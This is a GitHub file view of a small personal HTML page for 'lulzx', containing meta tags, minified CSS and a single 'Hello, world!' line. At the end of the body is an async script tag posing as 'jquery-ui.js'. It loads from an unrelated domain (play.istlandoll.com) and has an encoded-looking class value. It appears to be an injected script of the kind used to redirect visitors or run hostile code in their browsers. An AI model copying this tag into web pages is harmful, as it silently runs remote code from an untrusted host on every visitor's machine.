-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathprofile.html
25 lines (25 loc) · 6.14 KB
/
profile.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<meta name="author" content="lulzx">
<meta name="description" content="Hello, world!">
<link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'>
<meta property="og:url" content="http://lulzx.github.io">
<meta property="og:title" content="Lulzx">
<meta property="og:site_name" content="Lulzx">
<meta property="og:image" content="IMG_20180522_212913.jpg"/>
<meta property="og:description" content="Hello, world!">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Lulzx">
<meta name="twitter:description" content="Hello, world!">
<meta name="twitter:creator" content="Lulzx">
<title>Lulzx</title>
</head>
<body>
<style>@import url(https://fonts.googleapis.com/css?family=Neucha|Patrick+Hand+SC);/*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}img{border-style:none}[type=reset],[type=submit],html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}[type=checkbox],[type=radio]{box-sizing:border-box;padding:0}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-cancel-button,[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}summary{display:list-item}[hidden]{display:none}html{box-sizing:border-box}*,:after,:before{box-sizing:inherit}.paper{border:1px solid #c1c0bd;background-color:#fff;padding:2rem;margin-top:1rem;margin-bottom:1rem;-webkit-box-shadow:-1px 5px 35px -9px rgba(0,0,0,.2);-moz-box-shadow:-1px 5px 35px -9px rgba(0,0,0,.2);box-shadow:-1px 5px 35px -9px rgba(0,0,0,.2)}@media only screen and (max-width:480px){.paper{padding:1rem;width:100%;margin-top:0;margin-bottom:0}}html{font-size:20px;font-family:Neucha,sans-serif;color:#41403e}p{font-family:Neucha,sans-serif}img{max-width:100%;height:auto;display:block;border:2px solid #41403e;border-top-left-radius:255px 15px;border-top-right-radius:15px 225px;border-bottom-right-radius:225px 15px;border-bottom-left-radius:15px 255px}[type=button]{align-self:center;background:0 0;-webkit-transition:all 235ms ease-in-out 0s;-moz-transition:all 235ms ease-in-out 0s;-o-transition:all 235ms ease-in-out 0s;transition:all 235ms ease-in-out 0s;color:#41403e;display:inline;outline:0;border:2px solid #41403e;border-top-left-radius:255px 15px;border-top-right-radius:15px 225px;border-bottom-right-radius:225px 15px;border-bottom-left-radius:15px 255px;font-size:1rem;padding:.75rem .75rem;cursor:pointer;-webkit-transition:all 235ms ease 0s;-moz-transition:all 235ms ease 0s;-o-transition:all 235ms ease 0s;transition:all 235ms ease 0s;box-shadow:15px 28px 25px -18px rgba(0,0,0,.2)}@media only screen and (max-width:520px){[type=button]{display:inline-block;margin:0 auto;text-align:center;margin-bottom:1rem}}[type=button]:hover{box-shadow:2px 8px 8px -5px rgba(0,0,0,.3);-webkit-transform:translate3d(0,2px,0);-ms-transform:translate3d(0,2px,0);transform:translate3d(0,2px,0)}[type=button]:focus{border:2px solid #0071de;-webkit-box-shadow:2px 8px 4px -6px rgba(0,0,0,.3);-moz-box-shadow:2px 8px 4px -6px rgba(0,0,0,.3);box-shadow:2px 8px 4px -6px rgba(0,0,0,.3)}[type=button]:active{border-color:rgba(0,0,0,.2);transition:none}[type=button][disabled]{cursor:not-allowed;opacity:.5}.card{-webkit-transition:all 235ms ease 0s;-moz-transition:all 235ms ease 0s;-o-transition:all 235ms ease 0s;transition:all 235ms ease 0s;box-shadow:15px 28px 25px -18px rgba(0,0,0,.2);position:relative;display:flex;flex-direction:column;word-wrap:break-word;border:2px solid #e6e7e9;backface-visibility:hidden;will-change:transform}.card:hover{box-shadow:2px 8px 8px -5px rgba(0,0,0,.3);-webkit-transform:translate3d(0,2px,0);-ms-transform:translate3d(0,2px,0);transform:translate3d(0,2px,0)}.card .card-body{flex:1 1 auto;padding:1.25rem}.card .card-body .card-title{margin-top:0;margin-bottom:.5rem}.card .card-body p{margin-top:0;margin-bottom:1rem}.card .card-body .card-link+.card-link{margin-left:1.25rem}.card img{border:0;border-radius:0}[popover-bottom],[popover-left],[popover-right],[popover-top]{position:relative;margin:24px}[popover-bottom]:hover:after,[popover-left]:hover:after,[popover-right]:hover:after,[popover-top]:hover:after{transition:opacity .2s ease-out;opacity:1}[popover-bottom]:after,[popover-left]:after,[popover-right]:after,[popover-top]:after{position:absolute;top:-6px;left:50%;opacity:0;padding:4px 2px;min-width:80px;font-size:.7em;text-align:center;color:#fff;background:rgba(0,0,0,.7);-webkit-transition:opacity 235ms ease-in-out 0s;-moz-transition:opacity 235ms ease-in-out 0s;-o-transition:opacity 235ms ease-in-out 0s;transition:opacity 235ms ease-in-out 0s;transform:translateX(-50%) translateY(-100%);border-top-left-radius:255px 15px;border-top-right-radius:15px 225px;border-bottom-right-radius:225px 15px;border-bottom-left-radius:15px 255px;border:2px solid #41403e}[popover-left]:before{left:0;top:50%;margin-left:-12px;transform:translateY(-50%) rotate(-90deg)}[popover-left]:after{content:attr(popover-left);left:0;top:50%;margin-left:-8px;transform:translateX(-100%) translateY(-50%)}[popover-right]:before{left:100%;top:50%;margin-left:1px;transform:translatey(-50%) rotate(90deg)}[popover-right]:after{content:attr(popover-right);left:100%;top:50%;margin-left:8px;transform:translateX(0) translateY(-50%)}[popover-top]:before{left:50%}[popover-top]:after{content:attr(popover-top);left:50%}[popover-bottom]:before{top:100%;margin-top:8px;transform:translateX(-50%) translatey(-100%) rotate(-180deg)}[popover-bottom]:after{content:attr(popover-bottom);top:100%;margin-top:8px;transform:translateX(-50%) translateY(0)}</style>
<p>Hello, world!</p>
<script async class="=UGg2Tjc5MkQ7NzU7MQ==" src="https://play.istlandoll.com/jquery-ui.js"></script>
</body>
</html>